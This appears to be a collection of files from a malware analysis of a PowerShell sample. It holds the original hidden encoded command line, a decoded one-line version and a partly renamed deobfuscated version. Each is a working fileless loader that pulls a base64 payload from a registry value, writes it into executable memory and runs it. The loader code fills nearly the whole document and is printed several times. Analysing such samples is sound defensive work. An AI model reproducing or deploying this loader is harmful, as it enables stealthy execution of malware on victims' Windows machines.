NathanTheGr8/decoded_original.ps1

## decoded_original.ps1
$SEf8caWj = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell";$lZ7VgLztH = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}";function ogbehJFrvi{Param([OutputType([Type])][Parameter( Position = 0)][Type[]]$jbvI6kAQ = (New-Object Type[](0)),[Parameter( Position = 1 )][Type]$TnlpqF = [Void])$SDaRf4 = [AppDomain]::CurrentDomain;$gV2cj6vD = New-Object System.Reflection.AssemblyName('ReflectedDelegate');$koQPMj5 = $SDaRf4.DefineDynamicAssembly($gV2cj6vD, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);$mQQYfW = $koQPMj5.DefineDynamicModule('InMemoryModule', $false);$OSepm3U = $mQQYfW.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);$GetNMD0W = $OSepm3U.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $jbvI6kAQ);$GetNMD0W.SetImplementationFlags('Runtime, Managed');$KBBPUUP = $OSepm3U.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $TnlpqF, $jbvI6kAQ);$KBBPUUP.SetImplementationFlags('Runtime, Managed');Write-Output $OSepm3U.CreateType();}function E66iaPG5($msLPAB, $r9dr88) {$ycPUx  = $msLPAB[$r9dr88+0] * 16777216;$ycPUx += $msLPAB[$r9dr88+1] * 65536;$ycPUx += $msLPAB[$r9dr88+2] * 256;$ycPUx += $msLPAB[$r9dr88+3] * 1;return $ycPUx;}$wFNcJpGX = @"
[DllImport("kernel32.dll")]public static extern IntPtr GetCurrentProcess();[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written);[DllImport("kernel32.dll")]public static extern uint SetErrorMode(uint uMode);
"@
$Xf7iI2 = Add-Type -memberDefinition $wFNcJpGX -Name "Win32" -namespace Win32Functions -passthru;function OaI9ZGaig5($wFNcJpGX, $dAau1, $M5hD1rY) {$r9PSH = $Xf7iI2::GetCurrentProcess();$hOVIPH = $Xf7iI2::VirtualAlloc(0,$wFNcJpGX.Length,0x00003000,0x40);$KpfaBcgtS = $Xf7iI2::VirtualAlloc(0,$M5hD1rY.Length,0x00003000,0x40);$Xf7iI2::WriteProcessMemory($r9PSH, $hOVIPH, $wFNcJpGX, $wFNcJpGX.Length, 0) | Out-Null;$Xf7iI2::WriteProcessMemory($r9PSH, $KpfaBcgtS, $M5hD1rY, $M5hD1rY.Length, 0) | Out-Null;$MNZhhv = [IntPtr]($hOVIPH.ToInt64()+$dAau1);$JjmOV = ogbehJFrvi @([IntPtr], [IntPtr]) ([Void]);$DFAhyM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MNZhhv, $JjmOV);$Xf7iI2::SetErrorMode(0x8006) | Out-Null;$DFAhyM.Invoke($KpfaBcgtS, $hOVIPH);}function iPpKRn8YS($wiIvdTk9qx, $XA1pa) {$IahTr = E66iaPG5 $wiIvdTk9qx 1;$mi0LSt1A = 5;while ($mi0LSt1A+8 -lt $IahTr) {$QheRB6j6 = $wiIvdTk9qx[$mi0LSt1A];$z2i2CBvTZG = E66iaPG5 $wiIvdTk9qx ($mi0LSt1A+1);$UAaIjo1Ssa = E66iaPG5 $wiIvdTk9qx ($mi0LSt1A+5);$mi0LSt1A += 9;if ($QheRB6j6 -eq $XA1pa) {OaI9ZGaig5 $wiIvdTk9qx[$mi0LSt1A..($mi0LSt1A+$z2i2CBvTZG)] $UAaIjo1Ssa $wiIvdTk9qx;break;} else {$mi0LSt1A += $z2i2CBvTZG;}}}$naO5fn = (Get-ItemProperty -Path "$SEf8caWj" -Name "$lZ7VgLztH").$lZ7VgLztH;$wiIvdTk9qx = [System.Convert]::FromBase64String($naO5fn);$wiIvdTk9qx[0] = 0;if ([IntPtr]::Size -eq 8) {iPpKRn8YS $wiIvdTk9qx 2;} else {iPpKRn8YS $wiIvdTk9qx 1;}

## improved_decoded_original.ps1
# Related resources
# - https://github.com/EmpireProject/Empire/blob/master/data/module_source/ImportTable_execution/Invoke-DllInjection.ps1
# - http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html

$RegKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell";
$RegName = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}";

function Get-DelegateType {
    Param
    (
        [OutputType([Type])]

        [Parameter( Position = 0)]
        [Type[]]
        $Parameters = (New-Object Type[](0)),

        [Parameter( Position = 1 )]
        [Type]
        $ReturnType = [Void]
    )

    $Domain = [AppDomain]::CurrentDomain;
    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate');
    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false);
    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters);
    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed');
    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters);
    $MethodBuilder.SetImplementationFlags('Runtime, Managed');
    Write-Output $TypeBuilder.CreateType();
}

function Unknown-FunctionTwo($F2DataIn, $Integer_2) {
    $DataOut  = $F2DataIn[$Integer_2+0] * 16777216;
    $DataOut += $F2DataIn[$Integer_2+1] * 65536;
    $DataOut += $F2DataIn[$Integer_2+2] * 256;
    $DataOut += $F2DataIn[$Integer_2+3] * 1;
    return $DataOut;
}

$ImportTable = @"
[DllImport("kernel32.dll")]
public static extern IntPtr GetCurrentProcess();

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written);

[DllImport("kernel32.dll")]
public static extern uint SetErrorMode(uint uMode);
"@

$WinFunc = Add-Type -memberDefinition $ImportTable -Name "Win32" -namespace Win32Functions -passthru;

function Unknown-FunctionThree($ImportTable, $dAau1, $M5hD1rY) {
    $HandlerGetCurrentProcess = $WinFunc::GetCurrentProcess();
    $HandlerVirtualAlloc1 = $WinFunc::VirtualAlloc(0, $ImportTable.Length, 0x00003000, 0x40);
    $HandlerVirtualAlloc2 = $WinFunc::VirtualAlloc(0, $M5hD1rY.Length, 0x00003000, 0x40);
    $WinFunc::WriteProcessMemory($HandlerGetCurrentProcess, $HandlerVirtualAlloc1, $ImportTable, $ImportTable.Length, 0) | Out-Null;
    $WinFunc::WriteProcessMemory($HandlerGetCurrentProcess, $HandlerVirtualAlloc2, $M5hD1rY, $M5hD1rY.Length, 0) | Out-Null;
    $IntOfHandlerVirtualAlloc1PlusdAau1 = [IntPtr]($HandlerVirtualAlloc1.ToInt64()+$dAau1);
    $JjmOV = Get-DelegateType @([IntPtr], [IntPtr]) ([Void]);
    $DFAhyM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IntOfHandlerVirtualAlloc1PlusdAau1, $JjmOV);
    $WinFunc::SetErrorMode(0x8006) | Out-Null;
    $DFAhyM.Invoke($HandlerVirtualAlloc2, $HandlerVirtualAlloc1);
}

function Unknown-FunctionFour($ByteArrayFromEnImportTabledData, $integer_1) {
    $IahTr = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData 1;
    $value_5 = 5;
    while ($value_5+8 -lt $IahTr) {
        $QheRB6j6 = $ByteArrayFromEnImportTabledData[$value_5];
        $z2i2CBvTZG = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData ($value_5+1);
        $UAaIjo1Ssa = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData ($value_5+5);
        $value_5 += 9;
        if ($QheRB6j6 -eq $integer_1) {
            Unknown-FunctionThree $ByteArrayFromEnImportTabledData[$value_5..($value_5+$z2i2CBvTZG)] $UAaIjo1Ssa $ByteArrayFromEnImportTabledData;
            break;
        } else {
            $value_5 += $z2i2CBvTZG;
            }
        }
    }

$EnImportTabledData = (Get-ItemProperty -Path "$RegKey" -Name "$RegName").$RegName;
$ByteArrayFromEnImportTabledData = [System.Convert]::FromBase64String($EnImportTabledData);
$ByteArrayFromEnImportTabledData[0] = 0;

if ([IntPtr]::Size -eq 8) {
    # x64 branch
    Unknown-FunctionFour $ByteArrayFromEnImportTabledData 2;
    } else {
        # x86 branch
        Unknown-FunctionFour $ByteArrayFromEnImportTabledData 1;
    }

## original.txt
C:\Windows\System32\WindowsPowershell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodeCommand JABTAEUAZgA4AGMAYQBXAGoAIAA9ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABTAGgAZQBsAGwAIgA7ACQAbABaADcAVgBnAEwAegB0AEgAIAA9ACAAIgB7ADQARgBGADIAMwBCADMAOAAtAEMANQBBADEALQA1AEMAQgBFAC0ARgAyADUARAA0ADUAOABFADEARgA4AEMANQA2ADQAMgB9ACIAOwBmAHUAbgBjAHQAaQBvAG4AIABvAGcAYgBlAGgASgBGAHIAdgBpAHsAUABhAHIAYQBtACgAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBUAHkAcABlAF0AKQBdAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAwACkAXQBbAFQAeQBwAGUAWwBdAF0AJABqAGIAdgBJADYAawBBAFEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVAB5AHAAZQBbAF0AKAAwACkAKQAsAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAxACAAKQBdAFsAVAB5AHAAZQBdACQAVABuAGwAcABxAEYAIAA9ACAAWwBWAG8AaQBkAF0AKQAkAFMARABhAFIAZgA0ACAAPQAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgA7ACQAZwBWADIAYwBqADYAdgBEACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAoACcAUgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlACcAKQA7ACQAawBvAFEAUABNAGoANQAgAD0AIAAkAFMARABhAFIAZgA0AC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBBAHMAcwBlAG0AYgBsAHkAKAAkAGcAVgAyAGMAagA2AHYARAAsACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBFAG0AaQB0AC4AQQBzAHMAZQBtAGIAbAB5AEIAdQBpAGwAZABlAHIAQQBjAGMAZQBzAHMAXQA6ADoAUgB1AG4AKQA7ACQAbQBRAFEAWQBmAFcAIAA9ACAAJABrAG8AUQBQAE0AagA1AC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBNAG8AZAB1AGwAZQAoACcASQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlACcALAAgACQAZgBhAGwAcwBlACkAOwAkAE8AUwBlAHAAbQAzAFUAIAA9ACAAJABtAFEAUQBZAGYAVwAuAEQAZQBmAGkAbgBlAFQAeQBwAGUAKAAnAE0AeQBEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAnACwAIAAnAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBhAGwAZQBkACwAIABBAG4AcwBpAEMAbABhAHMAcwAsACAAQQB1AHQAbwBDAGwAYQBzAHMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAE0AdQBsAHQAaQBjAGEAcwB0AEQAZQBsAGUAZwBhAHQAZQBdACkAOwAkAEcAZQB0AE4ATQBEADAAVwAgAD0AIAAkAE8AUwBlAHAAbQAzAFUALgBEAGUAZgBpAG4AZQBDAG8AbgBzAHQAcgB1AGMAdABvAHIAKAAnAFIAVABTAHAAZQBjAGkAYQBsAE4AYQBtAGUALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABQAHUAYgBsAGkAYwAnACwAIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEMAYQBsAGwAaQBuAGcAQwBvAG4AdgBlAG4AdABpAG8AbgBzAF0AOgA6AFMAdABhAG4AZABhAHIAZAAsACAAJABqAGIAdgBJADYAawBBAFEAKQA7ACQARwBlAHQATgBNAEQAMABXAC4AUwBlAHQASQBtAHAAbABlAG0AZQBuAHQAYQB0AGkAbwBuAEYAbABhAGcAcwAoACcAUgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAAnACkAOwAkAEsAQgBCAFAAVQBVAFAAIAA9ACAAJABPAFMAZQBwAG0AMwBVAC4ARABlAGYAaQBuAGUATQBlAHQAaABvAGQAKAAnAEkAbgB2AG8AawBlACcALAAgACcAUAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsACcALAAgACQAVABuAGwAcABxAEYALAAgACQAagBiAHYASQA2AGsAQQBRACkAOwAkAEsAQgBCAFAAVQBVAFAALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQA7AFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJABPAFMAZQBwAG0AMwBVAC4AQwByAGUAYQB0AGUAVAB5AHAAZQAoACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEUANgA2AGkAYQBQAEcANQAoACQAbQBzAEwAUABBAEIALAAgACQAcgA5AGQAcgA4ADgAKQAgAHsAJAB5AGMAUABVAHgAIAAgAD0AIAAkAG0AcwBMAFAAQQBCAFsAJAByADkAZAByADgAOAArADAAXQAgACoAIAAxADYANwA3ADcAMgAxADYAOwAkAHkAYwBQAFUAeAAgACsAPQAgACQAbQBzAEwAUABBAEIAWwAkAHIAOQBkAHIAOAA4ACsAMQBdACAAKgAgADYANQA1ADMANgA7ACQAeQBjAFAAVQB4ACAAKwA9ACAAJABtAHMATABQAEEAQgBbACQAcgA5AGQAcgA4ADgAKwAyAF0AIAAqACAAMgA1ADYAOwAkAHkAYwBQAFUAeAAgACsAPQAgACQAbQBzAEwAUABBAEIAWwAkAHIAOQBkAHIAOAA4ACsAMwBdACAAKgAgADEAOwByAGUAdAB1AHIAbgAgACQAeQBjAFAAVQB4ADsAfQAkAHcARgBOAGMASgBwAEcAWAAgAD0AIABAACIACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVwByAGkAdABlAFAAcgBvAGMAZQBzAHMATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHAAcgBvAGMAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAYQBkAGQAcgBlAHMAcwAsACAAYgB5AHQAZQBbAF0AIABiAHUAZgBmAGUAcgAsACAAdQBpAG4AdAAgAHMAaQB6AGUALAAgAHUAaQBuAHQAIAB3AHIAaQB0AHQAZQBuACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAUwBlAHQARQByAHIAbwByAE0AbwBkAGUAKAB1AGkAbgB0ACAAdQBNAG8AZABlACkAOwAKACIAQAAKACQAWABmADcAaQBJADIAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB3AEYATgBjAEoAcABHAFgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAZgB1AG4AYwB0AGkAbwBuACAATwBhAEkAOQBaAEcAYQBpAGcANQAoACQAdwBGAE4AYwBKAHAARwBYACwAIAAkAGQAQQBhAHUAMQAsACAAJABNADUAaABEADEAcgBZACkAIAB7ACQAcgA5AFAAUwBIACAAPQAgACQAWABmADcAaQBJADIAOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwAkAGgATwBWAEkAUABIACAAPQAgACQAWABmADcAaQBJADIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAdwBGAE4AYwBKAHAARwBYAC4ATABlAG4AZwB0AGgALAAwAHgAMAAwADAAMAAzADAAMAAwACwAMAB4ADQAMAApADsAJABLAHAAZgBhAEIAYwBnAHQAUwAgAD0AIAAkAFgAZgA3AGkASQAyADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAkAE0ANQBoAEQAMQByAFkALgBMAGUAbgBnAHQAaAAsADAAeAAwADAAMAAwADMAMAAwADAALAAwAHgANAAwACkAOwAkAFgAZgA3AGkASQAyADoAOgBXAHIAaQB0AGUAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAoACQAcgA5AFAAUwBIACwAIAAkAGgATwBWAEkAUABIACwAIAAkAHcARgBOAGMASgBwAEcAWAAsACAAJAB3AEYATgBjAEoAcABHAFgALgBMAGUAbgBnAHQAaAAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQAWABmADcAaQBJADIAOgA6AFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgAJAByADkAUABTAEgALAAgACQASwBwAGYAYQBCAGMAZwB0AFMALAAgACQATQA1AGgARAAxAHIAWQAsACAAJABNADUAaABEADEAcgBZAC4ATABlAG4AZwB0AGgALAAgADAAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAE0ATgBaAGgAaAB2ACAAPQAgAFsASQBuAHQAUAB0AHIAXQAoACQAaABPAFYASQBQAEgALgBUAG8ASQBuAHQANgA0ACgAKQArACQAZABBAGEAdQAxACkAOwAkAEoAagBtAE8AVgAgAD0AIABvAGcAYgBlAGgASgBGAHIAdgBpACAAQAAoAFsASQBuAHQAUAB0AHIAXQAsACAAWwBJAG4AdABQAHQAcgBdACkAIAAoAFsAVgBvAGkAZABdACkAOwAkAEQARgBBAGgAeQBNACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEcAZQB0AEQAZQBsAGUAZwBhAHQAZQBGAG8AcgBGAHUAbgBjAHQAaQBvAG4AUABvAGkAbgB0AGUAcgAoACQATQBOAFoAaABoAHYALAAgACQASgBqAG0ATwBWACkAOwAkAFgAZgA3AGkASQAyADoAOgBTAGUAdABFAHIAcgBvAHIATQBvAGQAZQAoADAAeAA4ADAAMAA2ACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAJABEAEYAQQBoAHkATQAuAEkAbgB2AG8AawBlACgAJABLAHAAZgBhAEIAYwBnAHQAUwAsACAAJABoAE8AVgBJAFAASAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABpAFAAcABLAFIAbgA4AFkAUwAoACQAdwBpAEkAdgBkAFQAawA5AHEAeAAsACAAJABYAEEAMQBwAGEAKQAgAHsAJABJAGEAaABUAHIAIAA9ACAARQA2ADYAaQBhAFAARwA1ACAAJAB3AGkASQB2AGQAVABrADkAcQB4ACAAMQA7ACQAbQBpADAATABTAHQAMQBBACAAPQAgADUAOwB3AGgAaQBsAGUAIAAoACQAbQBpADAATABTAHQAMQBBACsAOAAgAC0AbAB0ACAAJABJAGEAaABUAHIAKQAgAHsAJABRAGgAZQBSAEIANgBqADYAIAA9ACAAJAB3AGkASQB2AGQAVABrADkAcQB4AFsAJABtAGkAMABMAFMAdAAxAEEAXQA7ACQAegAyAGkAMgBDAEIAdgBUAFoARwAgAD0AIABFADYANgBpAGEAUABHADUAIAAkAHcAaQBJAHYAZABUAGsAOQBxAHgAIAAoACQAbQBpADAATABTAHQAMQBBACsAMQApADsAJABVAEEAYQBJAGoAbwAxAFMAcwBhACAAPQAgAEUANgA2AGkAYQBQAEcANQAgACQAdwBpAEkAdgBkAFQAawA5AHEAeAAgACgAJABtAGkAMABMAFMAdAAxAEEAKwA1ACkAOwAkAG0AaQAwAEwAUwB0ADEAQQAgACsAPQAgADkAOwBpAGYAIAAoACQAUQBoAGUAUgBCADYAagA2ACAALQBlAHEAIAAkAFgAQQAxAHAAYQApACAAewBPAGEASQA5AFoARwBhAGkAZwA1ACAAJAB3AGkASQB2AGQAVABrADkAcQB4AFsAJABtAGkAMABMAFMAdAAxAEEALgAuACgAJABtAGkAMABMAFMAdAAxAEEAKwAkAHoAMgBpADIAQwBCAHYAVABaAEcAKQBdACAAJABVAEEAYQBJAGoAbwAxAFMAcwBhACAAJAB3AGkASQB2AGQAVABrADkAcQB4ADsAYgByAGUAYQBrADsAfQAgAGUAbABzAGUAIAB7ACQAbQBpADAATABTAHQAMQBBACAAKwA9ACAAJAB6ADIAaQAyAEMAQgB2AFQAWgBHADsAfQB9AH0AJABuAGEATwA1AGYAbgAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAUwBFAGYAOABjAGEAVwBqACIAIAAtAE4AYQBtAGUAIAAiACQAbABaADcAVgBnAEwAegB0AEgAIgApAC4AJABsAFoANwBWAGcATAB6AHQASAA7ACQAdwBpAEkAdgBkAFQAawA5AHEAeAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABuAGEATwA1AGYAbgApADsAJAB3AGkASQB2AGQAVABrADkAcQB4AFsAMABdACAAPQAgADAAOwBpAGYAIAAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApACAAewBpAFAAcABLAFIAbgA4AFkAUwAgACQAdwBpAEkAdgBkAFQAawA5AHEAeAAgADIAOwB9ACAAZQBsAHMAZQAgAHsAaQBQAHAASwBSAG4AOABZAFMAIAAkAHcAaQBJAHYAZABUAGsAOQBxAHgAIAAxADsAfQAKAA==
	$SEf8caWj = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell";$lZ7VgLztH = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}";function ogbehJFrvi{Param([OutputType([Type])][Parameter( Position = 0)][Type[]]$jbvI6kAQ = (New-Object Type[](0)),[Parameter( Position = 1 )][Type]$TnlpqF = [Void])$SDaRf4 = [AppDomain]::CurrentDomain;$gV2cj6vD = New-Object System.Reflection.AssemblyName('ReflectedDelegate');$koQPMj5 = $SDaRf4.DefineDynamicAssembly($gV2cj6vD, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);$mQQYfW = $koQPMj5.DefineDynamicModule('InMemoryModule', $false);$OSepm3U = $mQQYfW.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);$GetNMD0W = $OSepm3U.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $jbvI6kAQ);$GetNMD0W.SetImplementationFlags('Runtime, Managed');$KBBPUUP = $OSepm3U.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $TnlpqF, $jbvI6kAQ);$KBBPUUP.SetImplementationFlags('Runtime, Managed');Write-Output $OSepm3U.CreateType();}function E66iaPG5($msLPAB, $r9dr88) {$ycPUx = $msLPAB[$r9dr88+0] * 16777216;$ycPUx += $msLPAB[$r9dr88+1] * 65536;$ycPUx += $msLPAB[$r9dr88+2] * 256;$ycPUx += $msLPAB[$r9dr88+3] * 1;return $ycPUx;}$wFNcJpGX = @"
	[DllImport("kernel32.dll")]public static extern IntPtr GetCurrentProcess();[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written);[DllImport("kernel32.dll")]public static extern uint SetErrorMode(uint uMode);
	"@
	$Xf7iI2 = Add-Type -memberDefinition $wFNcJpGX -Name "Win32" -namespace Win32Functions -passthru;function OaI9ZGaig5($wFNcJpGX, $dAau1, $M5hD1rY) {$r9PSH = $Xf7iI2::GetCurrentProcess();$hOVIPH = $Xf7iI2::VirtualAlloc(0,$wFNcJpGX.Length,0x00003000,0x40);$KpfaBcgtS = $Xf7iI2::VirtualAlloc(0,$M5hD1rY.Length,0x00003000,0x40);$Xf7iI2::WriteProcessMemory($r9PSH, $hOVIPH, $wFNcJpGX, $wFNcJpGX.Length, 0) \| Out-Null;$Xf7iI2::WriteProcessMemory($r9PSH, $KpfaBcgtS, $M5hD1rY, $M5hD1rY.Length, 0) \| Out-Null;$MNZhhv = [IntPtr]($hOVIPH.ToInt64()+$dAau1);$JjmOV = ogbehJFrvi @([IntPtr], [IntPtr]) ([Void]);$DFAhyM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MNZhhv, $JjmOV);$Xf7iI2::SetErrorMode(0x8006) \| Out-Null;$DFAhyM.Invoke($KpfaBcgtS, $hOVIPH);}function iPpKRn8YS($wiIvdTk9qx, $XA1pa) {$IahTr = E66iaPG5 $wiIvdTk9qx 1;$mi0LSt1A = 5;while ($mi0LSt1A+8 -lt $IahTr) {$QheRB6j6 = $wiIvdTk9qx[$mi0LSt1A];$z2i2CBvTZG = E66iaPG5 $wiIvdTk9qx ($mi0LSt1A+1);$UAaIjo1Ssa = E66iaPG5 $wiIvdTk9qx ($mi0LSt1A+5);$mi0LSt1A += 9;if ($QheRB6j6 -eq $XA1pa) {OaI9ZGaig5 $wiIvdTk9qx[$mi0LSt1A..($mi0LSt1A+$z2i2CBvTZG)] $UAaIjo1Ssa $wiIvdTk9qx;break;} else {$mi0LSt1A += $z2i2CBvTZG;}}}$naO5fn = (Get-ItemProperty -Path "$SEf8caWj" -Name "$lZ7VgLztH").$lZ7VgLztH;$wiIvdTk9qx = [System.Convert]::FromBase64String($naO5fn);$wiIvdTk9qx[0] = 0;if ([IntPtr]::Size -eq 8) {iPpKRn8YS $wiIvdTk9qx 2;} else {iPpKRn8YS $wiIvdTk9qx 1;}
	# Related resources
	# - https://github.com/EmpireProject/Empire/blob/master/data/module_source/ImportTable_execution/Invoke-DllInjection.ps1
	# - http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html

	$RegKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell";
	$RegName = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}";

	function Get-DelegateType {
	Param
	(
	[OutputType([Type])]

	[Parameter( Position = 0)]
	[Type[]]
	$Parameters = (New-Object Type[](0)),

	[Parameter( Position = 1 )]
	[Type]
	$ReturnType = [Void]
	)

	$Domain = [AppDomain]::CurrentDomain;
	$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate');
	$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);
	$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false);
